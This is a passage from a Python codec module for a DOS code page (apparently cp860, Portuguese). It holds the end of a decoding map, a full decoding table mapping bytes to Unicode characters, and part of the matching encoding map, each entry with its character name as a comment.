0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe3' # 0x0084 -> LATIN SMALL LETTER A WITH TILDE
u'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
u'\xc1' # 0x0086 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xca' # 0x0089 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
u'\xcd' # 0x008b -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xd4' # 0x008c -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xec' # 0x008d -> LATIN SMALL LETTER I WITH GRAVE
u'\xc3' # 0x008e -> LATIN CAPITAL LETTER A WITH TILDE
u'\xc2' # 0x008f -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xc0' # 0x0091 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc8' # 0x0092 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf5' # 0x0094 -> LATIN SMALL LETTER O WITH TILDE
u'\xf2' # 0x0095 -> LATIN SMALL LETTER O WITH GRAVE
u'\xda' # 0x0096 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
u'\xcc' # 0x0098 -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd5' # 0x0099 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xa2' # 0x009b -> CENT SIGN
u'\xa3' # 0x009c -> POUND SIGN
u'\xd9' # 0x009d -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u20a7' # 0x009e -> PESETA SIGN
u'\xd3' # 0x009f -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xe1' # 0x00a0 -> LATIN SMALL LETTER A WITH ACUTE
u'\xed' # 0x00a1 -> LATIN SMALL LETTER I WITH ACUTE
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
u'\xf1' # 0x00a4 -> LATIN SMALL LETTER N WITH TILDE
u'\xd1' # 0x00a5 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xaa' # 0x00a6 -> FEMININE ORDINAL INDICATOR
u'\xba' # 0x00a7 -> MASCULINE ORDINAL INDICATOR
u'\xbf' # 0x00a8 -> INVERTED QUESTION MARK
u'\xd2' # 0x00a9 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\xa1' # 0x00ad -> INVERTED EXCLAMATION MARK
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\u03b1' # 0x00e0 -> GREEK SMALL LETTER ALPHA
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
u'\u0393' # 0x00e2 -> GREEK CAPITAL LETTER GAMMA
u'\u03c0' # 0x00e3 -> GREEK SMALL LETTER PI
u'\u03a3' # 0x00e4 -> GREEK CAPITAL LETTER SIGMA
u'\u03c3' # 0x00e5 -> GREEK SMALL LETTER SIGMA
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\u03c4' # 0x00e7 -> GREEK SMALL LETTER TAU
u'\u03a6' # 0x00e8 -> GREEK CAPITAL LETTER PHI
u'\u0398' # 0x00e9 -> GREEK CAPITAL LETTER THETA
u'\u03a9' # 0x00ea -> GREEK CAPITAL LETTER OMEGA
u'\u03b4' # 0x00eb -> GREEK SMALL LETTER DELTA
u'\u221e' # 0x00ec -> INFINITY
u'\u03c6' # 0x00ed -> GREEK SMALL LETTER PHI
u'\u03b5' # 0x00ee -> GREEK SMALL LETTER EPSILON
u'\u2229' # 0x00ef -> INTERSECTION
u'\u2261' # 0x00f0 -> IDENTICAL TO
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
u'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
u'\u2320' # 0x00f4 -> TOP HALF INTEGRAL
u'\u2321' # 0x00f5 -> BOTTOM HALF INTEGRAL
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\u2248' # 0x00f7 -> ALMOST EQUAL TO
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\u221a' # 0x00fb -> SQUARE ROOT
u'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a1: 0x00ad, # INVERTED EXCLAMATION MARK
0x00a2: 0x009b, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00aa: 0x00a6, # FEMININE ORDINAL INDICATOR
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b5: 0x00e6, # MICRO SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00ba: 0x00a7, # MASCULINE ORDINAL INDICATOR
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00bf: 0x00a8, # INVERTED QUESTION MARK
0x00c0: 0x0091, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c1: 0x0086, # LATIN CAPITAL LETTER A WITH ACUTE
0x00c2: 0x008f, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c3: 0x008e, # LATIN CAPITAL LETTER A WITH TILDE
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x0092, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x0089, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cc: 0x0098, # LATIN CAPITAL LETTER I WITH GRAVE
0x00cd: 0x008b, # LATIN CAPITAL LETTER I WITH ACUTE
0x00d1: 0x00a5, # LATIN CAPITAL LETTER N WITH TILDE
0x00d2: 0x00a9, # LATIN CAPITAL LETTER O WITH GRAVE
0x00d3: 0x009f, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d4: 0x008c, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d5: 0x0099, # LATIN CAPITAL LETTER O WITH TILDE
0x00d9: 0x009d, # LATIN CAPITAL LETTER U WITH GRAVE
0x00da: 0x0096, # LATIN CAPITAL LETTER U WITH ACUTE
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e1: 0x00a0, # LATIN SMALL LETTER A WITH ACUTE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e3: 0x0084, # LATIN SMALL LETTER A WITH TILDE
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00ec: 0x008d, # LATIN SMALL LETTER I WITH GRAVE
0x00ed: 0x00a1, # LATIN SMALL LETTER I WITH ACUTE
0x00f1: 0x00a4, # LATIN SMALL LETTER N WITH TILDE
0x00f2: 0x0095, # LATIN SMALL LETTER O WITH GRAVE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f5: 0x0094, # LATIN SMALL LETTER O WITH TILDE
0x00f7: 0x00f6, # DIVISION SIGN
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0393: 0x00e2, # GREEK CAPITAL LETTER GAMMA
0x0398: 0x00e9, # GREEK CAPITAL LETTER THETA
0x03a3: 0x00e4, # GREEK CAPITAL LETTER SIGMA
0x03a6: 0x00e8, # GREEK CAPITAL LETTER PHI
0x03a9: 0x00ea, # GREEK CAPITAL LETTER OMEGA
0x03b1: 0x00e0, # GREEK SMALL LETTER ALPHA
0x03b4: 0x00eb, # GREEK SMALL LETTER DELTA
0x03b5: 0x00ee, # GREEK SMALL LETTER EPSILON
0x03c0: 0x00e3, # GREEK SMALL LETTER PI
0x03c3: 0x00e5, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00e7, # GREEK SMALL LETTER TAU
0x03c6: 0x00ed, # GREEK SMALL LETTER PHI
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x20a7: 0x009e, # PESETA SIGN
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x221e: 0x00ec, # INFINITY
0x2229: 0x00ef, # INTERSECTION
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2261: 0x00f0, # IDENTICAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2320: 0x00f4, # TOP HALF INTEGRAL
0x2321: 0x00f5, # BOTTOM HALF INTEGRAL
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
